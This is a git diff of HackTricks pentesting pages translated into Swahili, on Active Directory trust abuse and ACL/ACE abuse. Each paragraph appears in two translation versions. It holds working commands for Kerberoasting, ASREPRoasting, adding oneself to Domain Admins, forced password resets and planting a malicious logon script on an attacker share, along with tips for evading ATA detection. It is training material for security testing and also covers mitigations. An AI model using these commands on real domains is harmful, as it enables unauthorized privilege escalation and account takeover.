- **Local Group Membership**: Principals wanaweza kuongezwa kwenye vikundi vya ndani kwenye mashine, kama kikundi cha “Administrators” kwenye server, kuwaweka na udhibiti mkubwa juu ya mashine hiyo.
- **Foreign Domain Group Membership**: Principals pia wanaweza kuwa wanachama wa vikundi ndani ya domain ya kigeni. Hata hivyo, ufanisi wa mbinu hii hutegemea aina ya trust na wigo wa kikundi.
- **Access Control Lists (ACLs)**: Principals wanaweza kuorodheshwa katika **ACL**, hasa kama entities katika **ACEs** ndani ya **DACL**, wakiwapa ufikiaji wa rasilimali maalum. Kwa wale wanaotaka kuingia kwa undani zaidi kwenye mekanika za ACLs, DACLs, na ACEs, whitepaper iitwayo “[An ACE Up The Sleeve](https://specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)” ni rasilimali muhimu.
### Find external users/groups with permissions
Unaweza kuangalia **`CN=<user_SID>,CN=ForeignSecurityPrincipals,DC=domain,DC=com`** kupata foreign security principals katika domain. Hawa watakuwa user/group kutoka **external domain/forest**.
Unaweza kuangalia **`CN=<user_SID>,CN=ForeignSecurityPrincipals,DC=domain,DC=com`** ili kupata foreign security principals katika domain. Hawa watakuwa user/group kutoka **an external domain/forest**.
Unaweza kuchunguza hili kwa kutumia **Bloodhound** au powerview:
Unaweza kuangalia hili kwa kutumia **Bloodhound** au kwa kutumia powerview:
```powershell
# Get users that are i groups outside of the current domain
Get-DomainForeignUser
@ -635,7 +639,7 @@ nltest /dclist:sub.domain.local
nltest /server:dc.sub.domain.local /domain_trusts /all_trusts
```
> [!WARNING]
> Kuna **2 trusted keys**, moja kwa ajili ya _Child --> Parent_ na nyingine kwa ajili ya _Parent_ --> _Child_.\
> Kuna **2 trusted keys**, moja kwa _Child --> Parent_ na nyingine kwa _Parent_ --> _Child_.\
> Unaweza kuona ile inayotumika na domain ya sasa kwa kutumia:
>
> ```bash
@ -645,7 +649,7 @@ nltest /server:dc.sub.domain.local /domain_trusts /all_trusts
#### SID-History Injection
Panda hadhi hadi Enterprise Admin katika domain ya child/parent kwa kuabusu trust kwa SID-History injection:
Panda hadhi kuwa Enterprise admin kwenye domain ya child/parent kwa kutumia trust na SID-History injection:
{{#ref}}
@ -654,26 +658,26 @@ sid-history-injection.md
#### Exploit writeable Configuration NC
Kuelewa jinsi Configuration Naming Context (NC) inaweza kutumiwa ni muhimu. Configuration NC inafanya kama hazina kuu ya data za konfigurishaji ndani ya forest katika mazingira ya Active Directory (AD). Data hii inariplikatwa kwa kila Domain Controller (DC) ndani ya forest, na DC zinazoweza kuandikwa zina nakala inayoweza kuandikwa ya Configuration NC. Ili kuitumia, lazima kuwa na **SYSTEM privileges on a DC**, bora DC wa child.
Ni muhimu kuelewa jinsi Configuration Naming Context (NC) inaweza kutumiwa. Configuration NC inafanya kazi kama hazina kuu ya data za configuration ndani ya forest katika mazingira ya Active Directory (AD). Data hii inaripukizwa kwa kila Domain Controller (DC) ndani ya forest, na writable DCs zinatunza nakala inayoweza kuandikwa ya Configuration NC. Ili kuifanyia exploit hii, mtu lazima awe na **SYSTEM privileges on a DC**, bora kuwa child DC.
**Link GPO to root DC site**
Container ya Sites ya Configuration NC inajumuisha taarifa kuhusu maeneo ya kompyuta zote zilizounganishwa na domain ndani ya AD forest. Kwa kufanya kazi ukiwa na **SYSTEM privileges on any DC**, wadukuzi wanaweza link GPOs kwa root DC sites. Kitendo hiki kinaweza kuhatarisha root domain kwa kubadilisha sera zinazotumika kwa maeneo haya.
Container ya Sites ya Configuration NC ina taarifa kuhusu sites za kompyuta zote zilizo joined kwenye domain ndani ya AD forest. Kwa kufanya kazi kwa SYSTEM privileges on any DC, mashambulizi yanaweza ku-link GPOs kwa root DC sites. Kitendo hiki kinaweza kudhoofisha root domain kwa kubadilisha policies zinazotumika kwa sites hizi.
Kwa maelezo ya kina, unaweza kusoma utafiti wa [Bypassing SID Filtering](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research).
Kwa taarifa za kina, unaweza kusoma utafiti kuhusu [Bypassing SID Filtering](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research).
**Compromise any gMSA in the forest**
Vector ya shambulio inahusisha kulenga gMSAs zilizo na ruhusa ndani ya domain. KDS Root key, muhimu kwa kuhesabu nywila za gMSAs, imehifadhiwa ndani ya Configuration NC. Ukiwa na **SYSTEM privileges on any DC**, inawezekana kupata KDS Root key na kuhesabu nywila za gMSA yoyote ndani ya forest.
Njia ya shambulio ni kulenga gMSA zenye hadhi ndani ya domain. KDS Root key, muhimu kwa kuhesabu passwords za gMSAs, imehifadhiwa ndani ya Configuration NC. Ukiwa na SYSTEM privileges on any DC, inawezekana kupata KDS Root key na kuhesabu passwords za gMSA yoyote ndani ya forest.
Uchambuzi wa kina na mwongozo wa hatua kwa hatua unaweza kupatikana katika:
Uchambuzi wa kina na mwongozo hatua kwa hatua unaweza kupatikana katika:
{{#ref}}
golden-dmsa-gmsa.md
{{#endref}}
Shambulio la ziada la delegated MSA (BadSuccessor abusing migration attributes):
Complementary delegated MSA attack (BadSuccessor abusing migration attributes):
{{#ref}}
@ -684,15 +688,15 @@ Utafiti wa ziada wa nje: [Golden gMSA Trust Attacks](https://improsec.com/tech-b
**Schema change attack**
Njia hii inahitaji uvumilivu, kusubiri uundaji wa vitu vipya vya AD vyenye ruhusa za juu. Ukiwa na **SYSTEM privileges**, mshambuliaji anaweza kubadilisha AD Schema ili kumuwezesha mtumiaji yeyote kupata udhibiti kamili juu ya madarasa yote. Hii inaweza kusababisha upatikanaji usioidhinishwa na udhibiti wa vitu vipya vya AD.
Mbinu hii inahitaji uvumilivu, kusubiri uundaji wa vitu vipya vya AD zenye hadhi. Ukiwa na SYSTEM privileges, mshambuliaji anaweza kubadilisha AD Schema ili kumpa mtumiaji yeyote udhibiti kamili juu ya classes zote. Hii inaweza kusababisha ufikiaji usioidhinishwa na udhibiti wa vitu vipya vilivyoundwa vya AD.
Kusoma zaidi kunaweza kupatikana kwenye [Schema Change Trust Attacks](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent).
Soma zaidi kwenye [Schema Change Trust Attacks](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent).
**From DA to EA with ADCS ESC5**
Udhaifu wa ADCS ESC5 unalenga kupata udhibiti wa vitu vya Public Key Infrastructure (PKI) ili kuunda template ya cheti inayoruhusu authentication kama mtumiaji yeyote ndani ya forest. Kwa kuwa vitu vya PKI viko katika Configuration NC, ku-compromise DC wa child aliye writeable kunaruhusu utekelezaji wa ESC5 attacks.
Udhaifu wa ADCS ESC5 unalenga udhibiti wa vitu vya Public Key Infrastructure (PKI) ili kuunda template ya cheti inayoruhusu authentication kama mtumiaji yeyote ndani ya forest. Kwa kuwa vitu vya PKI vipo katika Configuration NC, kudhoofisha writable child DC kunaruhusu utekelezaji wa mashambulizi ya ESC5.
Maelezo zaidi kuhusu hili yanapatikana kwenye [From DA to EA with ESC5](https://posts.specterops.io/from-da-to-ea-with-esc5-f9f045aa105c). Katika mazingira yasiyo na ADCS, mshambuliaji anaweza kutengeneza vipengele vinavyohitajika, kama ilivyoelezwa katika [Escalating from Child Domain Admins to Enterprise Admins](https://www.pkisolutions.com/escalating-from-child-domains-admins-to-enterprise-admins-in-5-minutes-by-abusing-ad-cs-a-follow-up/).
Taarifa zaidi zinaweza kusomwa kwenye [From DA to EA with ESC5](https://posts.specterops.io/from-da-to-ea-with-esc5-f9f045aa105c). Katika mazingira yasiyo na ADCS, mshambuliaji ana uwezo wa kuanzisha vipengele vinavyohitajika, kama ilivyojadiliwa katika [Escalating from Child Domain Admins to Enterprise Admins](https://www.pkisolutions.com/escalating-from-child-domains-admins-to-enterprise-admins-in-5-minutes-by-abusing-ad-cs-a-follow-up/).
### External Forest Domain - One-Way (Inbound) or bidirectional
```bash
@ -705,13 +709,14 @@ TrustDirection : Inbound --> Inboud trust
WhenCreated : 2/19/2021 10:50:56 PM
WhenChanged : 2/19/2021 10:50:56 PM
```
Katika tukio hili **domaini yako imeaminishwa** na nyingine ya nje ikikupa **idhinisho zisizojulikana** juu yake. Utahitaji kubaini **ni principals gani katika domaini yako wana upatikanaji gani juu ya domaini ya nje** na kisha kujaribu ku-exploit:
Katika senario hii **domain yako inategemewa** na domain ya nje ikikupa **ruhusa zisizojulikana** juu yake. Utahitaji kubaini **ni principals gani wa domain yako wana ruhusa gani juu ya domain ya nje** kisha kujaribu kui-exploit:
{{#ref}}
external-forest-domain-oneway-inbound.md
{{#endref}}
### Domaini ya Msitu ya Nje - Njia Moja (Outbound)
### External Forest Domain - One-Way (Outbound)
```bash
Get-DomainTrust -Domain current.local
@ -723,35 +728,35 @@ TrustDirection : Outbound --> Outbound trust
WhenCreated : 2/19/2021 10:15:24 PM
WhenChanged : 2/19/2021 10:15:24 PM
```
Katika senario hii **your domain** inakuwa **trusting** baadhi ya **privileges** kwa **principal** kutoka **different domains**.
Katika senario hii **your domain** inakuwa **trusting** baadhi ya **privileges** kwa mhusika kutoka **different domains**.
Hata hivyo, wakati **a domain is trusted** na domain inayomwamini, domain iliyothibitishwa **creates a user** yenye **predictable name** inayotumia kama **password the trusted password**. Hii ina maana kwamba inawezekana **access a user from the trusting domain to get inside the trusted one** ili kuitafuta na kujaribu kuongeza privileges zaidi:
Walakini, wakati **domain is trusted** na domain inayomwamini, domain ya kutegemewa **creates a user** na jina **predictable name** ambalo hutumia kama **password the trusted password**. Hii ina maana kuwa inawezekana **access a user from the trusting domain to get inside the trusted one** ili kuorodhesha (enumerate) na kujaribu kuongeza privileges zaidi:
{{#ref}}
external-forest-domain-one-way-outbound.md
{{#endref}}
Njia nyingine ya kuathiri domain iliyothibitishwa ni kupata [**SQL trusted link**](abusing-ad-mssql.md#mssql-trusted-links) iliyoundwa kwa mwelekeo wa **opposite direction** wa domain trust (ambayo si ya kawaida sana).
Njia nyingine ya kumdhalilisha domain iliyotegemewa ni kupata [**SQL trusted link**](abusing-ad-mssql.md#mssql-trusted-links) iliyoundwa katika **opposite direction** ya uaminiano wa domain (ambayo haipo kwa kawaida).
Njia nyingine ya kuathiri domain iliyothibitishwa ni kusubiri kwenye mashine ambapo **a user from the trusted domain can access** kuingia kupitia **RDP**. Kisha, mshambuliaji anaweza kuingiza code katika mchakato wa RDP session na **access the origin domain of the victim** kutoka hapo.\ Moreover, ikiwa **victim mounted his hard drive**, kutoka kwa mchakato wa **RDP session** mshambuliaji anaweza kuhifadhi **backdoors** katika **startup folder of the hard drive**. Tekniku hii inaitwa **RDPInception.**
Njia nyingine ya kumdhalilisha domain iliyotegemewa ni kusubiri kwenye mashine ambako **user from the trusted domain can access** kuingia kupitia **RDP**. Kisha, mshambuliaji anaweza kuingiza nambari ndani ya mchakato wa RDP session na **access the origin domain of the victim** kutoka hapo. Aidha, ikiwa **victim mounted his hard drive**, kutoka kwa mchakato wa **RDP session** mshambuliaji anaweza kuweka **backdoors** kwenye **startup folder of the hard drive**. Mbinu hii inaitwa **RDPInception.**
{{#ref}}
rdp-sessions-abuse.md
{{#endref}}
### Domain trust abuse mitigation
### Kupunguza matumizi mabaya ya uaminiano wa domain
### **SID Filtering:**
- Hatari ya mashambulizi yanayotumia SID history attribute kwa njia ya forest trusts hupunguzwa na SID Filtering, ambayo imewezeshwa kwa default kwenye inter-forest trusts zote. Hii inaungwa mkono kwa dhana kwamba intra-forest trusts ni salama, ikizingatia forest, badala ya domain, kama mpaka wa usalama kulingana na mtazamo wa Microsoft.
- Hata hivyo, kuna changamoto: SID filtering inaweza kuathiri applications na upatikanaji wa watumiaji, ikapelekea kuzimwa kwake mara kwa mara.
- Hatari ya mashambulizi yanayotumia attribute ya SID history kati ya forest trusts hupunguzwa na SID Filtering, ambayo imewashwa kwa default kwenye inter-forest trusts zote. Hii inategemea dhana kwamba intra-forest trusts ni salama, ikichukulia forest, badala ya domain, kama mpaka wa usalama kulingana na msimamo wa Microsoft.
- Hata hivyo, kuna tatizo: SID filtering inaweza kusumbua programu na ufikiaji wa watumiaji, na kusababisha mara kwa mara kuzimwa kwake.
### **Selective Authentication:**
- Kwa inter-forest trusts, kutumia Selective Authentication huhakikisha kwamba watumiaji kutoka misitu miwili hawathibitishwi kiotomatiki. Badala yake, ruhusa maalum zinahitajika kwa watumiaji kufikia domains na servers ndani ya trusting domain au forest.
- Ni muhimu kutambua kwamba hatua hizi hazilindi dhidi ya unyonyaji wa writable Configuration Naming Context (NC) au mashambulizi dhidi ya trust account.
- Kwa inter-forest trusts, kutumia Selective Authentication inahakikisha kwamba watumiaji kutoka misitu miwili hawathibitishwi moja kwa moja. Badala yake, ruhusa za wazi zinahitajika kwa watumiaji ili kufikia domains na servers ndani ya domain au forest inayomwamini.
- Ni muhimu kutambua kwamba hatua hizi hazilindi dhidi ya matumizi mabaya ya writable Configuration Naming Context (NC) au mashambulizi dhidi ya trust account.
[**More information about domain trusts in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain)
@ -766,31 +771,31 @@ https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-move
[**Learn more about how to protect credentials here.**](../stealing-credentials/credentials-protections.md)
### **Hatua za Kuzuia kwa Ulinzi wa Credentials**
### **Defensive Measures for Credential Protection**
- **Domain Admins Restrictions**: Inashauriwa kwamba Domain Admins waweze kuingia tu kwenye Domain Controllers, kuepuka matumizi yao kwenye hosts nyingine.
- **Service Account Privileges**: Huduma zisifanywe run zikiendeshwa kwa Domain Admin (DA) privileges ili kudumisha usalama.
- **Temporal Privilege Limitation**: Kwa kazi zinazohitaji DA privileges, muda wake unapaswa kufungwa. Hii inaweza kufanyika kwa: `Add-ADGroupMember -Identity Domain Admins -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)`
- **Domain Admins Restrictions**: Inashauriwa kwamba Domain Admins waruhusiwe kuingia tu kwenye Domain Controllers, kuepuka matumizi yao kwenye hosts nyingine.
- **Service Account Privileges**: Huduma hazipaswi kuendeshwa zikiwa na Domain Admin (DA) privileges ili kudumisha usalama.
- **Temporal Privilege Limitation**: Kwa kazi zinazohitaji DA privileges, muda wake unapaswa kupunguzwa. Hii inaweza kufikiwa kwa: `Add-ADGroupMember -Identity Domain Admins -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)`
### **Implementing Deception Techniques**
- Kutekeleza deception kunahusisha kuweka mitego, kama watumiaji wa kuiga (decoy users) au kompyuta, zenye sifa kama passwords ambazo hazitoweki au zimewekwa kama Trusted for Delegation. Mbinu ya kina inajumuisha kuunda watumiaji wenye haki maalum au kuwaongeza kwenye vikundi vya hali ya juu.
- Mfano wa vitendo unahusisha matumizi ya zana kama: `Create-DecoyUser -UserFirstName user -UserLastName manager-uncommon -Password Pass@123 | DeployUserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose`
- Zaidi kuhusu kutekeleza deception techniques zinapatikana kwenye [Deploy-Deception on GitHub](https://github.com/samratashok/Deploy-Deception).
- Kutumia udanganyifu kunahusisha kuweka mtego, kama watumiaji wa kudanganya au kompyuta, zenye sifa kama passwords zisizokufa au zimewekewa alama Trusted for Delegation. Mbinu ya kina inajumuisha kuunda watumiaji wenye haki maalum au kuwaongeza kwenye vikundi vyenye privileges za juu.
- Mfano wa vitendo unahusisha kutumia zana kama: `Create-DecoyUser -UserFirstName user -UserLastName manager-uncommon -Password Pass@123 | DeployUserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose`
- Zaidi kuhusu deploying deception techniques zinapatikana kwenye [Deploy-Deception on GitHub](https://github.com/samratashok/Deploy-Deception).
### **Identifying Deception**
- **For User Objects**: Viashiria vinavyotia shaka ni pamoja na ObjectSID isiyo ya kawaida, kuingia mara chache (infrequent logons), tarehe za uundaji, na idadi ndogo ya majaribio mabaya ya password.
- **General Indicators**: Kulinganisha sifa za vitu vinavyoweza kuwa decoy na zile za vitu halisi kunaweza kufichua kutofanana. Zana kama [HoneypotBuster](https://github.com/JavelinNetworks/HoneypotBuster) zinaweza kusaidia kutambua deception hizo.
- **For User Objects**: Viashiria vinavyoshuku vinajumuisha ObjectSID isiyo ya kawaida, logons chache, tarehe za uundaji, na idadi ndogo ya majaribio ya nywila mbaya.
- **General Indicators**: Kuk مقارنة (comparing) sifa za vitu vinavyoweza kuwa decoy na zile za vya kweli kunaweza kufunua tofauti. Zana kama [HoneypotBuster](https://github.com/JavelinNetworks/HoneypotBuster) zinaweza kusaidia kutambua udanganyifu huo.
### **Bypassing Detection Systems**
- **Microsoft ATA Detection Bypass**:
- **User Enumeration**: Kuepuka session enumeration kwenye Domain Controllers ili kuzuia utambuzi wa ATA.
- **Ticket Impersonation**: Kutumia vitufe vya **aes** kwa ajili ya uundaji wa tiketi husaidia kutoweka utambuzi kwa kutoangusha hadi NTLM.
- **DCSync Attacks**: Kutekeleza kutoka non-Domain Controller ili kuepuka utambuzi wa ATA kunapendekezwa, kwani utekelezaji wa moja kwa moja kutoka Domain Controller utasababisha tahadhari.
- **User Enumeration**: Kuepuka enumeration ya session kwenye Domain Controllers ili kuzuia utambuzi wa ATA.
- **Ticket Impersonation**: Kutumia funguo za **aes** kwa uundaji wa tiketi husaidia kuepuka ugunduzi kwa kutoangusha hadi NTLM.
- **DCSync Attacks**: Inashauriwa kutekeleza kutoka non-Domain Controller ili kuepuka utambuzi wa ATA, kwani utekelezaji wa moja kwa moja kutoka Domain Controller utasababisha onyo.
## Marejeo
## References
- [http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/)
- [https://www.labofapenetrationtester.com/2018/10/deploy-deception.html](https://www.labofapenetrationtester.com/2018/10/deploy-deception.html)

92
src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
View File

@ -1,8 +1,8 @@
# Kutumia vibaya Active Directory ACLs/ACEs
# Kutumia Vibaya Active Directory ACLs/ACEs
{{#include ../../../banners/hacktricks-training.md}}
**Ukurasa huu ni hasa muhtasari wa mbinu kutoka** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **na** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)**. Kwa maelezo zaidi, angalia makala za asili.**
**Ukurasa huu ni muhtasari wa mbinu kutoka** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **na** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)**. Kwa maelezo zaidi, angalia makala asili.**
## BadSuccessor
@ -13,30 +13,30 @@ BadSuccessor.md
## **Haki za GenericAll kwa Mtumiaji**
Haki hii inampa mdukuzi udhibiti kamili wa akaunti ya mtumiaji lengwa. Mara haki za `GenericAll` zinapothibitishwa kwa kutumia amri `Get-ObjectAcl`, mdukuzi anaweza:
Haki hii inampa mshambuliaji udhibiti kamili wa akaunti ya mtumiaji anayelengwa. Mara haki za `GenericAll` zinapothibitishwa kwa kutumia amri ya `Get-ObjectAcl`, mshambuliaji anaweza:
- **Badili nenosiri la mtumiaji lengwa**: Kwa kutumia `net user <username> <password> /domain`, mdukuzi anaweza kuweka upya nenosiri la mtumiaji.
- **Targeted Kerberoasting**: Weka SPN kwenye akaunti ya mtumiaji ili kuifanya iwe kerberoastable, kisha tumia Rubeus na targetedKerberoast.py kutoa na kujaribu kuvunja ticket-granting ticket (TGT) hashes.
- **Badilisha Nenosiri la Lengo**: Kutumia `net user <username> <password> /domain`, mshambuliaji anaweza kuweka upya nenosiri la mtumiaji.
- **Targeted Kerberoasting**: Kuweka SPN kwenye akaunti ya mtumiaji ili kuiifanya kerberoastable, kisha tumia Rubeus na targetedKerberoast.py kutoa na kujaribu kuvunja hash za ticket-granting ticket (TGT).
```bash
Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}
.\Rubeus.exe kerberoast /user:<username> /nowrap
Set-DomainObject -Credential $creds -Identity <username> -Clear serviceprincipalname -Verbose
```
- **Iliyolengwa ASREPRoasting**: Zima pre-authentication kwa mtumiaji, ukifanya akaunti yao iwe nyeti kwa ASREPRoasting.
- **Targeted ASREPRoasting**: Zima pre-authentication kwa mtumiaji, ukifanya akaunti yao iwe hatarini kwa ASREPRoasting.
```bash
Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
```
## **GenericAll Rights on Group**
## **Haki za GenericAll kwenye Kundi**
Haki hii inamruhusu mshambulizi kubadilisha uanachama wa vikundi ikiwa ana haki za `GenericAll` kwenye kikundi kama `Domain Admins`. Baada ya kutambua distinguished name ya kikundi kwa kutumia `Get-NetGroup`, mshambulizi anaweza:
Haki hii inamwezesha mshambuliaji kubadilisha uanachama wa vikundi ikiwa ana haki za `GenericAll` kwenye kundi kama `Domain Admins`. Baada ya kutambua distinguished name ya kundi kwa kutumia `Get-NetGroup`, mshambuliaji anaweza:
- **Kujiongeza kwenye kikundi cha Domain Admins**: Hii inaweza kufanywa kwa amri za moja kwa moja au kwa kutumia moduli kama Active Directory au PowerSploit.
- **Kujiongeza kwenye kundi la `Domain Admins`**: Hii inaweza kufanywa kupitia amri za moja kwa moja au kwa kutumia modules kama Active Directory au PowerSploit.
```bash
net group "domain admins" spotless /add /domain
Add-ADGroupMember -Identity "domain admins" -Members spotless
Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"
```
Kutoka Linux, unaweza pia kutumia BloodyAD kujiweka katika vikundi vyovyote unapokuwa na uanachama wa GenericAll/Write juu yao. Ikiwa kikundi lengwa kimewekwa ndani ya “Remote Management Users”, utapata mara moja ufikiaji wa WinRM kwenye hosts zinazoheshimu kikundi hicho:
- Kutoka Linux unaweza pia kutumia BloodyAD kujiongezea kwenye vikundi vyovyote endapo una uanachama wa GenericAll/Write juu yao. Ikiwa kundi lengwa limejumuishwa ndani ya “Remote Management Users”, utapata mara moja ufikiaji wa WinRM kwenye hosts zinazoheshimu kundi hilo:
```bash
# Linux tooling example (BloodyAD) to add yourself to a target group
bloodyAD --host <dc-fqdn> -d <domain> -u <user> -p '<pass>' add groupMember "<Target Group>" <user>
@ -46,35 +46,35 @@ netexec winrm <dc-fqdn> -u <user> -p '<pass>'
```
## **GenericAll / GenericWrite / Write on Computer/User**
Kushikilia vibali hivi kwenye objekti ya kompyuta au akaunti ya mtumiaji kunaruhusu:
Kuwa na ruhusa hizi kwenye kitu cha kompyuta au akaunti ya mtumiaji kunaruhusu:
- **Kerberos Resource-based Constrained Delegation**: Inaruhusu kuchukua udhibiti wa objekti ya kompyuta.
- **Shadow Credentials**: Tumia mbinu hii kuiga kompyuta au akaunti ya mtumiaji kwa kutumia vibali hivyo kuunda shadow credentials.
- **Kerberos Resource-based Constrained Delegation**: Inaruhusu kuchukua udhibiti wa kitu cha kompyuta.
- **Shadow Credentials**: Tumia mbinu hii kuiga kompyuta au akaunti ya mtumiaji kwa kutumia ruhusa kuunda shadow credentials.
## **WriteProperty on Group**
Ikiwa mtumiaji ana haki za `WriteProperty` kwa objekti zote za kikundi maalum (kwa mfano, `Domain Admins`), wanaweza:
Ikiwa mtumiaji ana haki za `WriteProperty` kwenye vitu vyote vya kikundi fulani (mfano, `Domain Admins`), wanaweza:
- **Kujiweka kwenye kikundi la Domain Admins**: Inawezekana kupitia kuunganisha amri za `net user` na `Add-NetGroupUser`; njia hii inawezesha kuinua vibali ndani ya domain.
- **Kujiongeza kwenye kikundi la Domain Admins**: Inaweza kufikiwa kwa kuchanganya amri za `net user` na `Add-NetGroupUser`; mbinu hii inaruhusu kupandisha hadhi ya ruhusa ndani ya domain.
```bash
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
```
## **Self (Self-Membership) on Group**
Haki hii inawawezesha washambuliaji kujiongezea kwenye vikundi maalum, kama `Domain Admins`, kupitia amri zinazobadilisha uanachama wa kikundi moja kwa moja. Kutumia mfululizo wa amri ufuatao kunaruhusu kujiongezea:
Haki hii inawawezesha washambuliaji kujiongeza wenyewe kwa vikundi maalum, kama `Domain Admins`, kupitia amri zinazobadilisha uanachama wa kikundi moja kwa moja. Kutumia mfululizo wa amri ufuatao kunaruhusu kujiongeza mwenyewe:
```bash
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
```
## **WriteProperty (Self-Membership)**
Ruhusa inayofanana, hii inawawezesha wadukuzi kuongeza wao wenyewe moja kwa moja kwenye vikundi kwa kubadilisha sifa za vikundi ikiwa wana haki ya `WriteProperty` kwenye vikundi hivyo. Uthibitisho na utekelezaji wa ruhusa hii hufanywa kwa:
Haki inayofanana, hii inawawezesha washambuliaji kujiongeza moja kwa moja kwenye vikundi kwa kubadilisha sifa za kikundi ikiwa wana haki ya `WriteProperty` kwenye vikundi hivyo. Uthibitisho na utekelezaji wa haki hii hufanywa na:
```bash
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
net group "domain admins" spotless /add /domain
```
## **ForceChangePassword**
Kumiliki `ExtendedRight` kwa mtumiaji kwa `User-Force-Change-Password` kunaruhusu reset ya nywila bila kujua nywila ya sasa. Uthibitisho wa haki hii na matumizi yake yanaweza kufanywa kupitia PowerShell au zana mbadala za command-line, zikitoa njia kadhaa za kurudisha nywila za mtumiaji, ikiwa ni pamoja na vikao vya mwingiliano na one-liners kwa mazingira yasiyo na mwingiliano. Amri zinatoka kwa mwito rahisi wa PowerShell hadi kutumia `rpcclient` kwenye Linux, zikionesha utofauti wa njia za mashambulizi.
Kushikilia `ExtendedRight` kwa mtumiaji kwa `User-Force-Change-Password` kunaruhusu kuweka nywila upya bila kujua nywila ya sasa. Uhakiki wa haki hii na exploitation yake yanaweza kufanywa kupitia PowerShell au zana nyingine za mstari wa amri, zikitoa mbinu kadhaa za kuweka upya nywila ya mtumiaji, ikijumuisha interactive sessions na one-liners kwa mazingira yasiyo ya kuingiliana. Amri zinaanzia kutoka miito rahisi za PowerShell hadi kutumia `rpcclient` kwenye Linux, zikionyesha utofauti wa attack vectors.
```bash
Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
Set-DomainUserPassword -Identity delegate -Verbose
@ -85,9 +85,9 @@ Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureStri
rpcclient -U KnownUsername 10.10.10.192
> setuserinfo2 UsernameChange 23 'ComplexP4ssw0rd!'
```
## **WriteOwner kwenye Kundi**
## **WriteOwner kwenye kikundi**
Ikiwa mshambuliaji atagundua kwamba ana haki za `WriteOwner` juu ya kundi, anaweza kubadilisha umiliki wa kundi huo kwa yeye mwenyewe. Hii ina athari kubwa hasa wakati kundi kinachozungumziwa ni `Domain Admins`, kwani kubadilisha umiliki kunaruhusu udhibiti mpana zaidi juu ya sifa za kundi na uanachama. Mchakato unahusisha kutambua kitu sahihi kupitia `Get-ObjectAcl` kisha kutumia `Set-DomainObjectOwner` kubadilisha mwenye umiliki, ama kwa SID au kwa jina.
Iwapo mshambuliaji atagundua kwamba ana haki za `WriteOwner` kwa kikundi, anaweza kubadilisha umiliki wa kikundi kwa ajili yake mwenyewe. Hii ina athari kubwa hasa wakati kikundi kinachohusika ni `Domain Admins`, kwa kuwa kubadilisha umiliki kunaruhusu udhibiti mpana wa sifa za kikundi na uanachama. Mchakato unajumuisha kutambua kitu sahihi kwa kutumia `Get-ObjectAcl` na kisha kutumia `Set-DomainObjectOwner` kubadilisha mmiliki, ama kwa SID au kwa jina.
```bash
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity "spotless" -Verbose
@ -95,13 +95,13 @@ Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico
```
## **GenericWrite kwa User**
Idhini hii inamruhusu mshambuliaji kubadilisha sifa za User. Hasa, kwa kupata ruhusa ya `GenericWrite`, mshambuliaji anaweza kubadilisha njia ya logon script ya User ili kuendesha script ya kibaya wakati wa kuingia kwa User. Hii inafikiwa kwa kutumia amri ya `Set-ADObject` kusasisha sifa ya `scriptpath` ya User lengwa ili kuielekeza kwenye script ya mshambuliaji.
Ruhusa hii inamruhusu attacker kubadilisha sifa za User. Hasa, kwa kupata ruhusa ya `GenericWrite`, attacker anaweza kubadilisha njia ya logon script ya User ili kuendesha script hasidi wakati User anapofanya logon. Hii inafikiwa kwa kutumia amri ya `Set-ADObject` kusasisha mali ya `scriptpath` ya User lengwa ili kuonyesha kwenye script ya attacker.
```bash
Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1"
```
## **GenericWrite on Group**
